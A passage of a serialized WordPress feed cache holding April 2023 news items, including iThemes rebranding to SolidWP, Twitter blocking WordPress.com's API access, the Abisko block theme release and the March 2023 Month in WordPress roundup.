\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"WPTavern: iThemes Rebrands to SolidWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143283\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wptavern.com/ithemes-rebrands-to-solidwp\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2861:\"<img />\n\n\n\n<p>iThemes, one of the oldest brands in WordPress that originally <a href=\"https://ithemes.com/blog/the-ithemes-story/\">launched around theme products</a> nearly 15 years ago, is <a href=\"https://solidwp.com/blog/press-release-ithemes-is-becoming-solidwp/\">rebranding to SolidWP</a>. Over the years, the company&#8217;s products became increasingly centered on plugins, yet the old brand had so much name recognition that its leadership was not quick to change it.</p>\n\n\n\n<p>&#8220;iThemes is known today for security, backups, and site maintenance – none of which are well-represented in the name &#8216;iThemes,\'&#8221; StellarWP Senior Director of Ops and Marketing Matt Cromwell said. &#8220;Additionally, the brand evokes the early 2000’s Apple era of technology, and we want to look toward the future.&#8221;</p>\n\n\n\n<p>This week the company kicked off a &#8220;rebrand in public&#8221; approach to updating its identity to be more aligned with promoting iThemes&#8217; key offerings &#8211; its security, backup, syncing, and educational products. They will all be rebranded to the following: </p>\n\n\n\n<ul>\n<li>Solid Security</li>\n\n\n\n<li>Solid Backups</li>\n\n\n\n<li>Solid Central</li>\n\n\n\n<li>Solid Academy</li>\n</ul>\n\n\n\n<p>&#8220;This shift in branding signifies our renewed focus on providing a solid foundation for every WordPress website,&#8221; Cromwell said. &#8220;Our whole team, as well as our products, will pivot to focus on security, backups, site maintenance, and training as we enhance and improve our solutions for all of our users.&#8221;</p>\n\n\n\n<p>The rebranding is a massive undertaking, as the company&#8217;s products have millions of users and years worth of articles, webinars, eBooks, and tutorials. SolidWP will present reworked pricing and retire some legacy products in the process.</p>\n\n\n\n<p>&#8220;Currently on ithemes.com you’ll find a lot of products that are either part of a bundle, or sold on other websites in a variety of ways,&#8221; Cromwell said in the FAQ section of the announcement. &#8220;Some products will continue to thrive on their own, and others will be retired. We plan on reviewing publicly the complete inventory of our current products and bundles and working with the community to shape what the future plan is for each.&#8221;</p>\n\n\n\n<p>The company is not planning to increase prices on its products at this time but Cromwell said they reserve the right to adjust pricing as needed. iThemes will also be consulting its community regarding products that are slated to be retired.</p>\n\n\n\n<p>&#8220;We will continue to support any and all who land in our support queue with our best efforts and service,&#8221; Cromwell said. &#8220;The official end-of-life for the products being sunset will be discussed with the community and decided on before the full launch of our new brand.&#8221;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 04 Apr 2023 22:33:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:34;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:99:\"WPTavern: Twitter Suspends WordPress.com’s Access to Twitter API, Breaking Jetpack Social Sharing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143281\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:106:\"https://wptavern.com/twitter-suspends-wordpress-coms-access-to-twitter-api-breaking-jetpack-social-sharing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3042:\"<p>Twitter <a href=\"https://jetpack.com/blog/an-update-on-jetpack-social-and-twitter/\">suspended WordPress.com&#8217;s access to the Twitter API</a> without notice yesterday. Representatives at WordPress.com do not know why their access is currently blocked but are working to regain it.</p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">Our access to the Twitter API is currently blocked. As a result, Jetpack Social is temporarily unable to automatically share your posts directly from <a href=\"https://t.co/eRvNKWaolr\">https://t.co/eRvNKWaolr</a> to Twitter.  We have reached out to Twitter for more information on how to get unblocked.</p>&mdash; WordPress.com (@wordpressdotcom) <a href=\"https://twitter.com/wordpressdotcom/status/1643240046621802497?ref_src=twsrc%5Etfw\">April 4, 2023</a></blockquote>\n</div>\n\n\n\n<p>The API enables features like Jetpack Social&#8217;s Twitter connection. Users who rely on this Jetpack module to auto-tweet their published posts will see errors in the dashboard until this issue is resolved. </p>\n\n\n\n<img />\n\n\n\n<p>WordPress.com <a href=\"https://wordpress.com/blog/2023/04/04/why-twitter-isnt-working-with-your-blog-right-now/\">advised</a> that reconnecting will not work at this time, nor will trying to establish a new connection. Connections to other social networks are still operational.</p>\n\n\n\n<p>On large publishing sites some authors may not be aware that the auto-tweet functionality is broken. For the time being, the solution is to manually tweet published posts. </p>\n\n\n\n<p>Jetpack users <a href=\"https://wordpress.org/support/topic/twitter-connections-from-wordpress-com-are-currently-experiencing-failures/\">reported</a> the issue in the plugin&#8217;s support forums 10 hours ago, as some of them are Jetpack Social paid subscribers. In October 2022, Jetpack <a href=\"https://wptavern.com/jetpack-social-plugin-adds-paid-plan-free-users-now-limited-to-30-shares-per-month\">announced</a> a paid plan for its Social plugin and limited the free version to 30 social shares per month, a controversial monetization decision that left many users in search of alternatives.</p>\n\n\n\n<p>Several users asked if refunds will be coming their way if the fix for the issue is not forthcoming, as auto-sharing to Facebook and Twitter is one of the main reasons customers subscribe to the service.</p>\n\n\n\n<p>&#8220;We are aware of issue and are looking into it with Twitter, but at this stage we don’t know when it will be fixed,&#8221; a Jetpack support representative responded to customers. &#8220;We’re working with Twitter to find the best solution possible.&#8221;</p>\n\n\n\n<p>Twitter <a href=\"https://twitter.com/TwitterDev/status/1641222789901484034\">launched</a> its new API access tiers on March 29, 2023. Access to the Enterprise tier requires an application process. Over the next 30 days Twitter is deprecating its previous access tiers and is encouraging developers to migrate to the new tiers as soon as possible to avoid disruption.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 04 Apr 2023 19:51:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:35;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"Do The Woo Community: Woo DevChat on WordPress Blocks with Nyasha Greene and Kathy Darling\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"https://dothewoo.io/?p=74694\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://dothewoo.io/developer-chat-wordpress-blocks/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:429:\"<p>Nyasha Greene and Kathy Darling have a conversation on what they are building lately, and the experiences they have had with blocks.</p>\n<p>&gt;&gt; The post <a rel=\"nofollow\" href=\"https://dothewoo.io/developer-chat-wordpress-blocks/\">Woo DevChat on WordPress Blocks with Nyasha Greene and Kathy Darling</a> appeared first on <a rel=\"nofollow\" href=\"https://dothewoo.io\">Do the Woo - a WooCommerce Builder Community</a>	.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 04 Apr 2023 09:35:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:36;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"WPTavern: Anders Norén Releases Abisko, a New Free WordPress Theme with 30+ Block Patterns\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143241\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:99:\"https://wptavern.com/anders-noren-releases-abisko-a-new-free-wordpress-theme-with-30-block-patterns\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3292:\"<p>Designer and developer Anders Norén has released a new free block theme called <a href=\"https://wordpress.org/themes/abisko/\">Abisko</a>, created to fully support the new design features available in the latest <a href=\"https://wptavern.com/wordpress-6-2-dolphy-introduces-a-revamped-site-editor-distraction-free-writing-mode-and-updated-block-inserter\">WordPress 6.2</a> release. The theme was named for one of Norén&#8217;s favorite stomping grounds, <a href=\"https://en.wikipedia.org/wiki/Abisko_National_Park\">Abisko national park</a>, where he hikes every summer.</p>\n\n\n\n<img />\n\n\n\n<p>Abisko places a strong emphasis on both images and typography, featuring the geometric &#8220;Plus Jakarta Sans&#8221; font for both headings and paragraph text. Plus Jakarta Sans was designed by Gumpita Rahayu from Tokotype in 2020. It seems to be gaining popularity and was mostly recently featured in the <a href=\"https://wptavern.com/lemmony-a-free-wordpress-block-theme-with-30-patterns\">free Lemmony theme</a> we reviewed last month. Plus Jakarta Sans is available as a free variable font and also on Google Fonts.</p>\n\n\n\n<p>At a font weight of 800, Abisko&#8217;s H1 and H2 headings make a major statement in the design across the various templates and patterns. Norén contrasts this with liberal use of whitespace so it doesn&#8217;t end up feeling overbearing.</p>\n\n\n\n<img />\n\n\n\n<p>Abisko includes five different style variations, with unique color palettes that will change the entire look and feel of the site. These are found under Appearance &gt; Editor and can be accessed through the Styles panel and applied globally when editing any template.</p>\n\n\n\n\n\n\n\n<p>Abisko packages more than 30 patterns for users to mix and match in creating pages. These include a grid with logo types, various artfully designed gallery layouts, contact section, various calls-to-action, hero patterns with images and background colors, testimonials grid, FAQ section, features list, a pricing table, large numbered lists, a wide separator with vertical margins, and more. </p>\n\n\n\n<p>The theme also has five full-page layouts available as patterns: About Us, Contact Us, FAQ, Front Page, and a Linktree style page.</p>\n\n\n\n<img />\n\n\n\n<p>The evolution of WordPress themes, becoming fully editable and packaged with style variations and dozens of patterns, means there is no single screenshot that can fully represent what a theme might look like. Check out the <a href=\"https://andersnoren.se/themes/abisko/\">live demo</a> to see what is possible and the page that previews all the <a href=\"https://andersnoren.se/themes/abisko/patterns/\">block patterns</a>.</p>\n\n\n\n<p>&#8220;Same as most block themes, Abisko is really lightweight and fast,&#8221; Norén said in a <a href=\"https://andersnoren.se/introducing-abisko/\">post</a> introducing his theme. &#8220;It has a small CSS file, includes no JavaScript at all, and uses locally hosted variable fonts to keep external requests and page size at a minimum.&#8221;</p>\n\n\n\n<p><a href=\"https://wordpress.org/themes/abisko/\">Abisko</a> is available for free on WordPress.org. Although Norén said he designed it with travel blogs in mind, it&#8217;s flexible for many different use cases, including agencies, portfolios, businesses, and personal websites.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 04 Apr 2023 03:06:02 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:37;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"WordPress.org blog: The Month in WordPress – March 2023\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=14780\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wordpress.org/news/2023/04/the-month-in-wordpress-march-2023/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:13171:\"<p>March saw the arrival of the first major release of 2023, WordPress 6.2 “Dolphy.” Planning for the project&#8217;s 20th anniversary continues with new celebratory updates and commemorative swag. Read on for the latest happenings in the WordPress space.</p>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<h2 class=\"wp-block-heading\">Meet WordPress 6.2 “Dolphy”</h2>\n\n\n\n<p><strong><a href=\"https://wordpress.org/news/2023/03/dolphy/\">WordPress 6.2</a> “Dolphy” was released on March 29, 2023</strong>. Named after the acclaimed jazz multi-instrumentalist and composer<strong> </strong>Eric Allan Dolphy Jr., the latest version of WordPress further enhances the site editing experience with significant updates.</p>\n\n\n\n<p>Highlights include a reimagined Site Editor interface, a more intuitive way to manage menus, and a distraction-free writing mode. A new Block Inserter design adds integration with <a href=\"https://openverse.org/\">Openverse</a>, allowing you to easily browse and insert free, openly-licensed images and audio files into your content.</p>\n\n\n\n<img width=\"1024\" height=\"581\" src=\"https://i0.wp.com/wordpress.org/news/files/2023/04/WordPress-6.2-highlight-grid.png?resize=1024%2C581&ssl=1\" alt=\"Feature highlights in WordPress 6.2: Reimagined Site Editor, more ways to manage menus, a more powerful inserter, faster access to media—yours and Openverse\'s, the new Style Book, distraction-free writing, and more.\" class=\"wp-image-14782\" />\n\n\n\n<p>Whether you&#8217;re a content creator, designer, or developer, WordPress 6.2 has something for you. <a href=\"https://wordpress.org/news/2023/03/dolphy/\"><strong>Check out the full announcement post</strong></a> for an overview of what&#8217;s new and the <a href=\"https://make.wordpress.org/core/2023/03/09/wordpress-6-2-field-guide/\">Field Guide</a> for detailed developer notes.</p>\n\n\n\n<p>WordPress 6.2 is one of the last major releases planned for Phase 2 of the <a href=\"https://wordpress.org/about/roadmap/\">project’s development roadmap</a> and was made possible thanks to more than 600 contributors.</p>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p><a href=\"https://make.wordpress.org/test/2023/02/07/help-test-wordpress-6-2/\"></a><a href=\"https://wordpress.org/download/\">Download WordPress 6.2 “Dolphy.”</a></p>\n</blockquote>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<h2 class=\"wp-block-heading\">WP20 swag is here</h2>\n\n\n\n<p>Show your WordPress excitement with <strong>limited edition 20th anniversary merchandise</strong>—now available at the official <a href=\"https://mercantile.wordpress.org/product-category/wp20/\"><strong>WordPress Mercantile store</strong></a>. If you prefer to create your own swag, you can use these <a href=\"https://wp20.wordpress.net/download-the-wp20-commemorative-logos/\">WP20 downloadable assets</a>.</p>\n\n\n\n<img width=\"1024\" height=\"576\" src=\"https://i0.wp.com/wordpress.org/news/files/2023/04/digital-banner-1.png?resize=1024%2C576&ssl=1\" alt=\"Blue background with confetti and WordPress 20th anniversary commemorative logo.\" class=\"wp-image-14785\" />\n\n\n\n<p>The 20th anniversary website <a href=\"https://wp20.wordpress.net/wp20-celebrations/\">lists celebrations</a> as organizers announce and schedule them. Check back regularly to see if there’s an event in your area to join or <a href=\"https://wordpress.org/news/2023/03/lets-party-organize-your-wp20-celebration/\">help organize one</a> to celebrate this milestone with your local community.</p>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p><a href=\"https://wp20.wordpress.net/wapuu-coloring-giveaway-style-your-own-party-wapuu/\">Enter the Wapuu Coloring Giveaway</a> by April 17, 2023, for a chance to win some commemorative WP20 swag!</p>\n</blockquote>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<h2 class=\"wp-block-heading\">New in the Gutenberg plugin</h2>\n\n\n\n<p>Two new versions of the Gutenberg plugin have shipped in the last month:</p>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2023/03/13/whats-new-in-gutenberg-15-3-13-march/\"><strong>Gutenberg 15.3</strong></a><strong> </strong>was released on March 13, 2023. This version polishes the Site Editor experience, includes a new “Time to Read” block for displaying estimated read time to posts, and enhances the Duotone design tool.</li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/22/whats-new-in-gutenberg-15-4-22-march/\"><strong>Gutenberg 15.4</strong></a> is available for download as of March 22, 2023, and focuses primarily on bug fixes and testing improvements. Other additions include color and layout support for the Cover block, improved descriptions to help you understand the purpose of each template in the Site Editor, and the ability to turn paragraph blocks into columns.</li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p><a href=\"https://make.wordpress.org/core/2023/02/01/core-editor-improvement-strengthening-style-options/\"></a>Follow the “<a href=\"https://make.wordpress.org/core/tag/gutenberg-new/\">What’s new in Gutenberg</a>” posts to stay on top of the latest enhancements.</p>\n</blockquote>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<h2 class=\"wp-block-heading\">Team updates: Phase 3 planning, WordPress Developer Blog launch, and more</h2>\n\n\n\n<ul>\n<li>Gutenberg Lead Architect Matías Ventura <a href=\"https://make.wordpress.org/core/2023/03/24/phase-3-collaboration/\">outlined the focus areas</a> for Phase 3 of the WordPress development roadmap, known as <strong>Collaboration</strong> or <strong>Collaborative Editing</strong>.</li>\n\n\n\n<li>Last month, the <a href=\"https://wordpress.org/news/2023/03/introducing-the-wordpress-developer-blog/\">WordPress Developer Blog</a> officially launched (removing the &#8220;beta&#8221; label). <a href=\"https://developer.wordpress.org/news/#subscribe\">Subscribe</a> to keep up with the latest features, tutorials, and learning resources in the WordPress development space.</li>\n\n\n\n<li>The Documentation Team seeks volunteers to help with <a href=\"https://make.wordpress.org/docs/2023/03/15/call-for-volunteers-to-help-with-6-2-end-user-documentation/\">WordPress 6.2 end user documentation</a>.</li>\n\n\n\n<li>Are you looking to broaden your knowledge and improve your WordPress skills? See <a href=\"https://make.wordpress.org/updates/2023/04/01/whats-new-on-learn-wordpress-in-march-2023/\">what’s new on Learn WordPress in March 2023</a>, including the latest course on <a href=\"https://learn.wordpress.org/course/converting-a-shortcode-to-a-block/\">Converting a Shortcode to a Block</a>.</li>\n\n\n\n<li>A new <a href=\"https://make.wordpress.org/themes/2023/03/03/hallway-hangout-community-themes-initiative/\">Community Themes initiative</a> aims to bring together a group of contributors to collaborate and build block themes.</li>\n\n\n\n<li>The Training Team is looking for assistance in creating content to complete <a href=\"https://make.wordpress.org/training/2023/03/29/introduction-to-wordpress-development-syllabus/\">this WordPress Development syllabus</a>.</li>\n\n\n\n<li>The newly formed Contributor Working Group <a href=\"https://make.wordpress.org/community/2023/03/23/recap-of-contributor-working-group-inaugural-mentorship-chat-on-march-20-2023/\">hosted an inaugural chat</a> to kick off work on the <a href=\"https://make.wordpress.org/project/2023/02/06/proposal-creating-a-wordpress-contributor-mentorship-program/\">WordPress Mentorship Program</a>.</li>\n\n\n\n<li>The Polyglots Team is <a href=\"https://make.wordpress.org/polyglots/2023/03/29/adding-chatgpt-and-deepl-in-the-translation-memory/\">testing AI systems</a> to help with translation work.</li>\n\n\n\n<li>The WordPress.org redesign project has a new dedicated Making WordPress Slack channel to coordinate work: <a href=\"https://wordpress.slack.com/archives/C04U953K77A\">#website-redesign</a>.</li>\n\n\n\n<li>The March 2023 editions of the <a href=\"https://make.wordpress.org/polyglots/2023/03/15/polyglots-monthly-newsletter-march-2023/\">Polyglots monthly newsletter</a> and the <a href=\"https://make.wordpress.org/community/2023/03/21/meetup-organizer-newsletter-march-2023/\">Meetup Organizer newsletter</a> are available for reading.</li>\n\n\n\n<li>The Mobile Team announced a <a href=\"https://make.wordpress.org/mobile/2023/03/28/new-mobile-support-forum/\">new support forum</a> for the WordPress mobile app.</li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>Tune in to <a href=\"https://wordpress.org/news/2023/03/episode-52-phase-three-with-hector-prieto/\">Episode 52 of WP Briefing</a> to learn more about the visioning behind Phase 3, Collaboration.</p>\n</blockquote>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<h2 class=\"wp-block-heading\">Feedback &amp; testing requests</h2>\n\n\n\n<ul>\n<li>A new Full Site Editing (FSE) Program exploration looks into the Site Editor as a design tool in light of the recent WordPress 6.2 release. Participants are asked to create a block theme without coding using the current editor tools. <a href=\"https://make.wordpress.org/test/2023/03/29/fse-program-exploration-build-a-block-theme/\">Share your experience</a> by April 26, 2023.</li>\n\n\n\n<li>A group of Core contributors is working on a new <a href=\"https://make.wordpress.org/core/2023/03/30/proposal-the-interactivity-api-a-better-developer-experience-in-building-interactive-blocks/\">Interactivity API proposal</a> to provide a better developer experience for building interactive blocks.</li>\n\n\n\n<li><a href=\"https://make.wordpress.org/updates/2023/03/25/mobile-team-update-march-25th/\">Version 22.0</a> of the WordPress mobile app for iOS and Android is ready for testing.</li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>Members of the Core Team are looking for user experience (UX) feedback on the <a href=\"https://make.wordpress.org/core/2023/03/28/call-for-testing-plugin-dependencies-ux/\">Plugin Dependencies feature plugin</a>.</p>\n</blockquote>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<h2 class=\"wp-block-heading\">WordPress events updates</h2>\n\n\n\n<ul>\n<li>WordCamp Asia 2024 is <a href=\"https://asia.wordcamp.org/2024/\">calling for organizers</a>. Apply by April 15, 2023.</li>\n\n\n\n<li>Registration for the <a href=\"https://europe.wordcamp.org/2023/contributor-day-registration-is-now-open/\">WordCamp Europe 2023 Contributor Day</a> is now open.</li>\n\n\n\n<li>Want to create diverse and inclusive WordPress events? Mark your calendars for the upcoming <a href=\"https://make.wordpress.org/community/handbook/meetup-organizer/event-formats/diversity-speaker-training-workshop/#upcoming-wpdiversity-workshops\">#WPDiversity workshops</a>.</li>\n\n\n\n<li>Four WordCamps are taking place this month:\n<ul>\n<li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1ee-1f1f9.png\" alt=\"🇮🇹\" class=\"wp-smiley\" /> <a href=\"https://torino.wordcamp.org/2023/\">WordCamp Torino</a>, Italy, on April 14-15, 2023</li>\n\n\n\n<li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1e6-1f1f9.png\" alt=\"🇦🇹\" class=\"wp-smiley\" /> <a href=\"https://vienna.wordcamp.org/2023/\">Wordcamp Vienna</a>, Austria, on April 15-16, 2023</li>\n\n\n\n<li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1eb-1f1f7.png\" alt=\"🇫🇷\" class=\"wp-smiley\" /> <a href=\"https://paris.wordcamp.org/2023/\">WordCamp Paris</a>, France, on April 21, 2023</li>\n\n\n\n<li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1e7-1f1ec.png\" alt=\"🇧🇬\" class=\"wp-smiley\" /> <a href=\"https://sofia.wordcamp.org/2023/\">WordCamp Sofia</a>, Bulgaria, on April 22-23, 2023</li>\n</ul>\n</li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>Join WordPress Executive Director Josepha Haden Chomphosy as she discusses <a href=\"https://wordpress.org/news/2023/03/episode-51-is-routine-a-rut/\">the benefits of routine and what role it plays in the WordPress project</a>.</p>\n</blockquote>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<hr class=\"wp-block-separator has-text-color has-light-grey-color has-alpha-channel-opacity has-light-grey-background-color has-background\" />\n\n\n\n<p><strong><em><strong><em><strong><em>Have a story we should include in the next issue of The Month in WordPress? <strong><em>Fill out </em></strong><a href=\"https://make.wordpress.org/community/month-in-wordpress-submissions/\"><strong><em>this quick form</em></strong></a><strong><em> to let us know.</em></strong></em></strong></em></strong></em></strong></p>\n\n\n\n<p><em><em>The following folks contributed to this Month in WordPress: <a href=\"https://profiles.wordpress.org/bsanevans/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>bsanevans</a>, <a href=\"https://profiles.wordpress.org/cbringmann/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>cbringmann</a>, <a href=\"https://profiles.wordpress.org/eidolonnight/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>eidolonnight</a>, <a href=\"https://profiles.wordpress.org/rmartinezduque/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>rmartinezduque</a>, <a href=\"https://profiles.wordpress.org/sereedmedia/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>sereedmedia</a>.</em></em></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 03 Apr 2023 10:30:57 